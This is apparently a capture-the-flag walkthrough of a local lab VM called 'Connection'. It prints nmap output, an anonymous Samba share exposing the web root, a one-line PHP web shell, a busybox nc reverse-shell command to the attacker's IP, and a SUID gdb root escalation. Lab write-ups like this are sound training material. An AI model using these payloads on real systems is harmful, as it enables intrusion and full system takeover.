HMV Connection

This is a Linux machine with SSH, Web, and Samba services enabled. During web directory enumeration, we did not discover any useful clues, so we moved on to the Samba service. Fortunately, in one of the shares, we found that it exposed the root directory of the web service, which allowed us to upload a web shell and gain an initial foothold on the system.

After performing basic system enumeration (such as checking sudo rules and SUID files), we discovered that gdb was configured with the SUID bit set and owned by root. By leveraging gdb's scripting capabilities, we were able to execute commands with elevated privileges and utimately obtain root access.

Summary

Scope

Name: Connection
Difficulty: Easy
OS: Linux
IP: Local VM

Learned

For the sharable service like FTP and Samba, we could try anonymous login first.
GTFObins is a curated list of Unix-like executables that can be used to bypass local security restrictions in misconfigured systems.

Enumeration

Nmap

Overall

# Nmap 7.98 scan initiated Mon Mar  2 14:10:44 2026 as: nmap -p- --min-rate 3000 -oN overall 192.168.1.40
Nmap scan report for 192.168.1.40
Host is up (0.000034s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

# Nmap done at Mon Mar  2 14:10:49 2026 -- 1 IP address (1 host up) scanned in 4.40 seconds

Detail

# Nmap 7.98 scan initiated Mon Mar  2 14:11:54 2026 as: nmap -sC -sV -O -vv -p22,80,139,445 -oN detail 192.168.1.40
Nmap scan report for 192.168.1.40
Host is up, received arp-response (0.00047s latency).
Scanned at 2026-03-02 14:11:59 CST for 12s

PORT    STATE SERVICE     REASON         VERSION
22/tcp  open  ssh         syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 b7:e6:01:b5:f9:06:a1:ea:40:04:29:44:f4:df:22:a1 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxNh+4rTxFF/c8dZwGAg+SIl5zJE1Rq8y3vlHZ2P7gTdRQDb7XlWK8W5O0XVtBVqWlvLZlHIOniUJlSlcps51cHo58B9KczrZME5phRmiYLOo2pTBmra6sZADq7mmlHkpz1LbpmgzSGchrrp9pSxUjcdmpffhgd79i/q0d4ya7vK4R/tcegMNUxjkmW83JCu0Mc2qw3JvzqCQ5BGyrgGrsb4VguV/MZrPzX8nwM7i2ivsg+d171360aa9SXtoGELkBfeqCOKRCOckw2gfQlo2tsdc26jwimBygMPpkAH87zMJdl5iEX7p9tPr4ddIp9DtPjsSB3Cu2ObOr9iAYVvy5
|   256 fb:16:94:df:93:89:c7:56:85:84:22:9e:a0:be:7c:95 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNHVs0JAs/3OsoWURkn+P6KrjxC1zzMry+q3H+RX+UW05NQvD3NORKjL0gnr+LOumhE1cMGmCgMTcaJ41T5nbxM=
|   256 45:2e:fb:87:04:eb:d1:8b:92:6f:6a:ea:5a:a2:a1:1c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIM9EVXAcxAJmQLNl3ttKL8QEWy+X+0R/rmS0tyt/bd2t
80/tcp  open  http        syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
139/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:E7:32:42 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
TCP/IP fingerprint:
OS:SCAN(V=7.98%E=4%D=3/2%OT=22%CT=%CU=36295%PV=Y%DS=1%DC=D%G=N%M=080027%TM=
OS:69A52A3B%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%T
OS:S=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=
OS:M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=F
OS:E88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=
OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=40%CD=S)

Uptime guess: 0.035 days (since Mon Mar  2 13:21:20 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: CONNECTION; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 56669/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 44585/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 26727/udp): CLEAN (Failed to receive data)
|   Check 4 (port 46900/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| nbstat: NetBIOS name: CONNECTION, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   CONNECTION<00>       Flags: <unique><active>
|   CONNECTION<03>       Flags: <unique><active>
|   CONNECTION<20>       Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| smb2-time: 
|   date: 2026-03-02T06:12:11
|_  start_date: N/A
|_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: 0s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: connection
|   NetBIOS computer name: CONNECTION\x00
|   Domain name: \x00
|   FQDN: connection
|_  System time: 2026-03-02T01:12:11-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar  2 14:12:11 2026 -- 1 IP address (1 host up) scanned in 16.90 seconds

UDPScan

# Nmap 7.98 scan initiated Mon Mar  2 14:12:52 2026 as: nmap -sU --top-ports 32 -oN udpscan 192.168.1.40
Nmap scan report for 192.168.1.40
Host is up (0.00057s latency).
Not shown: 29 closed udp ports (port-unreach)
PORT    STATE         SERVICE
68/udp  open|filtered dhcpc
137/udp open          netbios-ns
138/udp open|filtered netbios-dgm
MAC Address: 08:00:27:E7:32:42 (Oracle VirtualBox virtual NIC)

# Nmap done at Mon Mar  2 14:13:23 2026 -- 1 IP address (1 host up) scanned in 30.38 seconds

Web

I get nothing interesting from the web enumeration except the default index.html.

Samba

After that I try anonymous login with Samba service and then successful log in.

Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	share           Disk
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (Private Share for uploading files)
SMB1 disabled -- no workgroup available

❰curtain❙~/workspace/shooting/hmvm/connection❱✔≻ smbclient -N //192.168.1.40/share
Can't load /etc/samba/smb.conf - run testparm to debug it
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Sep 23 09:48:39 2020
  ..                                  D        0  Wed Sep 23 09:48:39 2020
  html                                D        0  Wed Sep 23 10:20:00 2020

		7158264 blocks of size 1024. 5264532 blocks available
smb: \> cd html
smb: \html\> ls
  .                                   D        0  Wed Sep 23 10:20:00 2020
  ..                                  D        0  Wed Sep 23 09:48:39 2020
  index.html                          N    10701  Wed Sep 23 09:48:45 2020

I immediately realize this is the root directory of the web service when I get that index.html and path hierarchy. Then we could upload a webshell to get an initial foothold of system.

Foothold

echo '<?php system($_GET["cmd"]); ?>' > shell.php

Then curl that shell.php will identify that vulnerability.

❰curtain❙~/workspace/shooting/hmvm/connection❱✔≻ curl http://192.168.1.40/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Yeah, now nc will help us getting the initial foothold.

❰curtain❙~/workspace/shooting/hmvm/connection❱✔≻ curl 'http://192.168.1.40/shell.php?cmd=busybox%20nc%20192.168.1.33%204444%20-e%20%2Fbin%2Fbash'



❰curtain❙~/workspace/shooting/hmvm/connection❱✔≻ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.40 50348
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Then I use script to get a more stable interactive shell.

script -q /dev/null -c bash
export TERM=xterm

Privilege Escalation

As usual, I gather the fundamental informations for privilege escalation. When I find the SUID program of the system, the gdb program with SUID set stands out.

www-data@connection:/var/www/html$ find / -mount -perm -u=s 2>/dev/null
find / -mount -perm -u=s 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/su
/usr/bin/passwd
/usr/bin/gdb
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/mount
/usr/bin/gpasswd
www-data@connection:/var/www/html$ ls -l /usr/bin/gdb
ls -l /usr/bin/gdb
-rwsr-sr-x 1 root root 8008480 Oct 14  2019 /usr/bin/gdb

And luckily, its belongs to root user! According to https://gtfobins.org/gtfobins/gdb/#shell, gdb can execute script at startup.

www-data@connection:/var/www/html$ gdb -nx -ex 'python import os; os.execl("/bin/bash", "bash", "-p")' -ex quit
/bash", "bash", "-p")' -ex quitos.execl("/bin/
GNU gdb (Debian 8.2.1-2+b3) 8.2.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word".
bash-5.0# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)

With euid equals to 0, now we're root!